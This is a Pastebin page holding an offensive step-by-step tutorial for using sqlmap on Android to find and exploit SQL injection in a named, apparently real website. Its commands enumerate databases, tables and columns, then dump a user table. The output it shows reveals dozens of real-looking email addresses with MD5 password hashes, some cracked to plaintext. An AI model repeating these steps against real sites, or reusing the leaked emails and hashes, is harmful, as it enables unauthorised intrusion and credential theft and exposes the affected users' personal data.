Pastebin
API
tools
faq
paste
Login
Sign up
Please fix the following errors:
New Paste
Syntax Highlighting
to check if a website if vulnerable add a ' to the end of the URL like this: http://www.100safe.com/user.php?uid=46 becomes: http://www.100safe.com/user.php?uid=46' if the website is vulnerable you should see an error like this somewhere on the page: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 now we will need to install then open termux. first we need to install python 2 and unzip. type: dpgk install python2 unzip download the latest sqlmap zip package from sqlmap.org next run these three commands: cd /sdcard/Download/ unzip sqlmap*.zip cd sqlmap* now we get started! next we are going to list the databases on the target website, enter this command. python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 --dbs if you get this it almost always means the site can be hacked: [10:57:59] [INFO] heuristic (basic) test shows that GET parameter 'uid' might be injectable (possible DBMS: 'MySQL') [10:58:00] [INFO] heuristic (XSS) test shows that GET parameter 'uid' might be vulnerable to cross-site scripting (XSS) attacks [10:58:00] [INFO] testing for SQL injection on GET parameter 'uid' once it says this: it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] type Y then press enter next you will get this for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] type Y then press enter once its done doing tests and finds a working injection method you will see output that should look like this: [10:05:15] [INFO] fetching database names [10:05:15] [INFO] used SQL query returns 8 entries [10:05:15] [INFO] resumed: information_schema [10:05:15] [INFO] resumed: 100safe [10:05:15] [INFO] resumed: Iloveyou [10:05:15] [INFO] resumed: hypocket_api [10:05:15] [INFO] resumed: mysql [10:05:15] [INFO] resumed: now [10:05:15] [INFO] resumed: performance_schema [10:05:15] [INFO] resumed: superpay_api available databases [8]: [*] 100safe [*] hypocket_api [*] Iloveyou [*] information_schema [*] mysql [*] now [*] performance_schema [*] superpay_api ^ those are the databases on the vulnerable server. to list the tables in a database use this command: python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 -D 100safe --tables the output should look like this: [10:07:32] [INFO] fetching tables for database: '100safe' [10:07:32] [INFO] used SQL query returns 39 entries Database: 100safe [39 tables] +------------------+ | pb_admingroups | | pb_adminlogs | | pb_adminonlines | | pb_announcements | | pb_applyinvite | | pb_attachments | | pb_categories | | pb_cdata | | pb_comments | | pb_commonlogs | | pb_configs | | pb_friends | | pb_fsession | | pb_guestmsg | | pb_invitecode | | pb_links | | pb_memberdata | | pb_memberexp | | pb_members | | pb_message | | pb_onlines | | pb_plugins | | pb_regions | | pb_scaches | | pb_sitestat | | pb_special | | pb_splink | | pb_tagcache | | pb_tags | | pb_tdata | | pb_templates | | pb_threads | | pb_threads_home | | pb_threads_tmp | | pb_tinfo | | pb_tinfo_home | | pb_tinfo_tmp | | pb_tplvar | | pb_usergroups | +------------------+ ^ those are the tables in the database "100safe" obviously we want to choose dump (download or read) the table pb_members cause it likely contains passwords of users. first we have to list the columns in the table. type in this command: python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 -D 100safe -T pb_members --columns the columns should look similar this for most user tables: [10:25:43] [INFO] fetching columns for table 'pb_members' in database '100safe' [10:25:43] [INFO] used SQL query returns 9 entries [10:25:43] [INFO] resumed: uid [10:25:43] [INFO] resumed: mediumint(8) unsigned [10:25:43] [INFO] resumed: username [10:25:43] [INFO] resumed: varchar(20) [10:25:43] [INFO] resumed: password [10:25:43] [INFO] resumed: char(32) [10:25:43] [INFO] resumed: email [10:25:43] [INFO] resumed: varchar(100) [10:25:43] [INFO] resumed: adminid [10:25:43] [INFO] resumed: tinyint(3) [10:25:43] [INFO] resumed: groupid [10:25:43] [INFO] resumed: tinyint(3) [10:25:43] [INFO] resumed: publicemail [10:25:43] [INFO] resumed: tinyint(1) [10:25:43] [INFO] resumed: regip [10:25:43] [INFO] resumed: char(15) [10:25:43] [INFO] resumed: regdate [10:25:43] [INFO] resumed: int(10) unsigned Database: 100safe Table: pb_members [9 columns] +-------------+-----------------------+ | Column | Type | +-------------+-----------------------+ | adminid | tinyint(3) | | email | varchar(100) | | groupid | tinyint(3) | | password | char(32) | | publicemail | tinyint(1) | | regdate | int(10) unsigned | | regip | char(15) | | uid | mediumint(8) unsigned | | username | varchar(20) | +-------------+-----------------------+ Now we will extract all the entries in the columns email, and password from the database: python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 -D 100safe -T pb_members -C email,password --dump sadly the passwords on this site are encrypted with MD5, but we were able to crack a couple. by the way sometimes on other websites the passwords are all plaintext! (unencrypted!) here is the output with what you should type in the prompts already there so you know what to do. [10:30:15] [INFO] fetching entries of column(s) 'email, password' for table 'pb_members' in database '100safe' [10:30:15] [INFO] used SQL query returns 790 entries [10:30:15] [WARNING] reflective value(s) found and filtering out [10:30:15] [INFO] retrieved: 1786ec46a1e6b28d3ede31ff2c4bf78b [10:30:15] [INFO] retrieved: 2plwvce9@30spmcuw.com [10:30:16] [INFO] retrieved: 49ba8995a4ed9671a0f7b8460c8fdedc [10:30:16] [INFO] retrieved: 3216016593@qq.com [10:30:16] [INFO] retrieved: b79b84652032835f635b4d0d4dd149e3 [10:30:17] [INFO] retrieved: 39p532uq@5jbrl7qb.com [10:30:17] [INFO] retrieved: d8a79e5469223f6800448a2e247efdb7 [10:30:17] [INFO] retrieved: 3e3yng79@r5odsr8g.com [10:30:17] [INFO] retrieved: 3653f8e024ade70beaf337c647af8eda [10:30:18] [INFO] retrieved: 3ioo9ytx@17igz8i8.com [10:30:18] [INFO] retrieved: d958f8dec96e85768387583d4cbb26dc [10:30:18] [INFO] retrieved: 3vxah88n@eoguvus4.com [10:30:19] [INFO] retrieved: 76ee1658d44021e53831bce63a465b37 [10:30:19] [INFO] retrieved: 43w6ua0g@3cmq9zgd.com [10:30:19] [INFO] retrieved: fef3d38d2fed7a7f9d1c7f29a2c67a83 [10:30:19] [INFO] retrieved: 446382023@qq.com [10:30:20] [INFO] retrieved: f96602e40dde4889fc2da79c3514abf3 [10:30:20] [WARNING] user aborted during enumeration. sqlmap will display partial output [10:30:20] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [10:30:31] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file 'C:\Users\New Owner\Desktop\Cracking\sqlmapproject-s qlmap-5e2d0bd\txt\wordlist.zip' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [10:30:35] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [10:30:38] [INFO] starting dictionary-based cracking (md5_generic_passwd) [10:30:38] [INFO] starting 2 processes [10:30:44] [INFO] cracked password '19850110' for hash 'dd3cda213b3da62490992d6a5e181874' [10:30:45] [INFO] cracked password '123456' for hash 'e10adc3949ba59abbe56e057f20f883e' Database: 100safe Table: pb_members [27 entries] +------------------------+---------------------------------------------+ | email | password | +------------------------+---------------------------------------------+ | 03ac6xea@fvhpa9ch.com | d6ff2b7b856f3b445340e9ccdf157929 | | 0408eric@pchome.com.tw | c96a267ff0f21de27cc50f9c45c3b8fb | | 07fff12w@quamhish.com | 891cbd7089d0e9f11a271b01cdf46e74 | | 0980155147@qma.com.tw | dd3cda213b3da62490992d6a5e181874 (19850110) | | 0azdydba@acaajp4m.com | 1b6b638cc4d1d7d32928e2f9b80b1797 | | 0bbgzl32@jssm911y.com | 1947e832f3baf43b0b4b5f5917ea1df5 | | 0ojrmsbz@ybru62d2.com | a38fcd68f6d7639ce1562020dd7e20e3 | | 0qgl9cts@qp6ccox9.com | 0385ee7071f1bb3f8712583f881b02ab | | 0xq4trm9@h5rzk35x.com | 8adfb726303aa07c55dc7b255e67ad4b | | 1048825dfdf152@qq.com | 02569624d5d0f06b17715d93d9eccc96 | | 1312760466@qq.com | e10adc3949ba59abbe56e057f20f883e (123456) | | 1598784253@qq.com | b71588f2be4628689b70beee50fe760f | | 1nca4m9o@zrr575k6.com | e3f87375269063de254da661034b537a | | 1nwpkj4a@iaysr57h.com | dddca8c5a130281102228c4b0f8b3b32 | | 1vml8miz@hadf8rqa.com | 6fe0ae027b11a404987d5431d71c2125 | | 2161283@163.com | e10adc3949ba59abbe56e057f20f883e (123456) | | 234owhb3@0ozh2tcs.com | 779ddc203741c1892a3456a951b73a9a | | 2ltlsq9i@cka0adls.com | 05494fa729bbefcf1acea2c180c7e04a | | 2nwy5tvv@rwe8lbpt.com | 1786ec46a1e6b28d3ede31ff2c4bf78b | | 2plwvce9@30spmcuw.com | 49ba8995a4ed9671a0f7b8460c8fdedc | | 3216016593@qq.com | b79b84652032835f635b4d0d4dd149e3 | | 39p532uq@5jbrl7qb.com | d8a79e5469223f6800448a2e247efdb7 | | 3e3yng79@r5odsr8g.com | 3653f8e024ade70beaf337c647af8eda | | 3ioo9ytx@17igz8i8.com | d958f8dec96e85768387583d4cbb26dc | | 3vxah88n@eoguvus4.com | 76ee1658d44021e53831bce63a465b37 | | 43w6ua0g@3cmq9zgd.com | fef3d38d2fed7a7f9d1c7f29a2c67a83 | | 446382023@qq.com | f96602e40dde4889fc2da79c3514abf3 | +------------------------+---------------------------------------------+ [10:32:32] [INFO] table '`100safe`.pb_members' dumped to CSV file 'C:\Users\New Owner\.sqlmap\output\www.100safe.com\dump\100safe\pb_members.csv' you can increase the speed of dumping by adding the option --threads=10 to the end of the dump command. and ya thats basically it! thats pretty much all you need to know about sqlmap!!! happy hacking mister 1337
Optional Paste Settings
Category:
None
Cryptocurrency
Cybersecurity
Fixit
Food
Gaming
Haiku
Help
History
Housing
Jokes
Legal
Money
Movies
Music
Pets
Photo
Science
Software
Source Code
Spirit
Sports
Travel
TV
Writing
Tags:
Syntax Highlighting:
None
Bash
C
C#
C++
CSS
HTML
JSON
Java
JavaScript
Lua
Markdown (PRO members only)
Objective C
PHP
Perl
Python
Ruby
Swift
4CS
6502 ACME Cross Assembler
6502 Kick Assembler
6502 TASM/64TASS
ABAP
AIMMS
ALGOL 68
APT Sources
ARM
ASM (NASM)
ASP
ActionScript
ActionScript 3
Ada
Apache Log
AppleScript
Arduino
Asymptote
AutoIt
Autohotkey
Avisynth
Awk
BASCOM AVR
BNF
BOO
Bash
Basic4GL
Batch
BibTeX
Blitz Basic
Blitz3D
BlitzMax
BrainFuck
C
C (WinAPI)
C Intermediate Language
C for Macs
C#
C++
C++ (WinAPI)
C++ (with Qt extensions)
C: Loadrunner
CAD DCL
CAD Lisp
CFDG
CMake
COBOL
CSS
Ceylon
ChaiScript
Chapel
Clojure
Clone C
Clone C++
CoffeeScript
ColdFusion
Cuesheet
D
DCL
DCPU-16
DCS
DIV
DOT
Dart
Delphi
Delphi Prism (Oxygene)
Diff
E
ECMAScript
EPC
Easytrieve
Eiffel
Email
Erlang
Euphoria
F#
FO Language
Falcon
Filemaker
Formula One
Fortran
FreeBasic
FreeSWITCH
GAMBAS
GDB
GDScript
Game Maker
Genero
Genie
GetText
Go
Godot GLSL
Groovy
GwBasic
HQ9 Plus
HTML
HTML 5
Haskell
Haxe
HicEst
IDL
INI file
INTERCAL
IO
ISPF Panel Definition
Icon
Inno Script
J
JCL
JSON
Java
Java 5
JavaScript
Julia
KSP (Kontakt Script)
KiXtart
Kotlin
LDIF
LLVM
LOL Code
LScript
Latex
Liberty BASIC
Linden Scripting
Lisp
Loco Basic
Logtalk
Lotus Formulas
Lotus Script
Lua
M68000 Assembler
MIX Assembler
MK-61/52
MPASM
MXML
MagikSF
Make
MapBasic
Markdown (PRO members only)
MatLab
Mercury
MetaPost
Modula 2
Modula 3
Motorola 68000 HiSoft Dev
MySQL
Nagios
NetRexx
Nginx
Nim
NullSoft Installer
OCaml
OCaml Brief
Oberon 2
Objeck Programming Langua
Objective C
Octave
Open Object Rexx
OpenBSD PACKET FILTER
OpenGL Shading
Openoffice BASIC
Oracle 11
Oracle 8
Oz
PARI/GP
PCRE
PHP
PHP Brief
PL/I
PL/SQL
POV-Ray
ParaSail
Pascal
Pawn
Per
Perl
Perl 6
Phix
Pic 16
Pike
Pixel Bender
PostScript
PostgreSQL
PowerBuilder
PowerShell
ProFTPd
Progress
Prolog
Properties
ProvideX
Puppet
PureBasic
PyCon
Python
Python for S60
QBasic
QML
R
RBScript
REBOL
REG
RPM Spec
Racket
Rails
Rexx
Robots
Roff Manpage
Ruby
Ruby Gnuplot
Rust
SAS
SCL
SPARK
SPARQL
SQF
SQL
SSH Config
Scala
Scheme
Scilab
SdlBasic
Smalltalk
Smarty
StandardML
StoneScript
SuperCollider
Swift
SystemVerilog
T-SQL
TCL
TeXgraph
Tera Term
TypeScript
TypoScript
UPC
Unicon
UnrealScript
Urbi
VB.NET
VBScript
VHDL
VIM
Vala
Vedit
VeriLog
Visual Pro Log
VisualBasic
VisualFoxPro
WHOIS
WhiteSpace
Winbatch
XBasic
XML
XPP
Xojo
Xorg Config
YAML
YARA
Z80 Assembler
ZXBasic
autoconf
jQuery
mIRC
newLISP
q/kdb+
thinBasic
Paste Expiration:
Never
Burn after read
10 Minutes
1 Hour
1 Day
1 Week
2 Weeks
1 Month
6 Months
1 Year
Paste Exposure:
Public
Unlisted
Private
Folder:
(members only)
Password
NEW
Enabled
Disabled
Burn after read
NEW
Paste Name / Title:
Create New Paste
Hello
Guest
Sign Up
or
Login
Sign in with Facebook
Sign in with Twitter
Sign in with Google
You are currently not logged in, this means you can not edit or delete anything you paste.
Sign Up
or
Login
Public Pastes
Untitled
12 hours ago | 13.15 KB
Analog GPUs: THE FUTURE
18 hours ago | 8.88 KB
Quotes I believe to be true.
18 hours ago | 0.16 KB
Die 7 wichtigsten Aktionen diese Woche
1 day ago | 4.17 KB
Untitled
1 day ago | 13.34 KB
Untitled
1 day ago | 13.59 KB
VNC SCRIPT 2/2: autoinput.vbs
VBScript | 1 day ago | 0.23 KB
VNC SCRIPT 1/2: vncauto.bat
Batch | 1 day ago | 0.72 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!
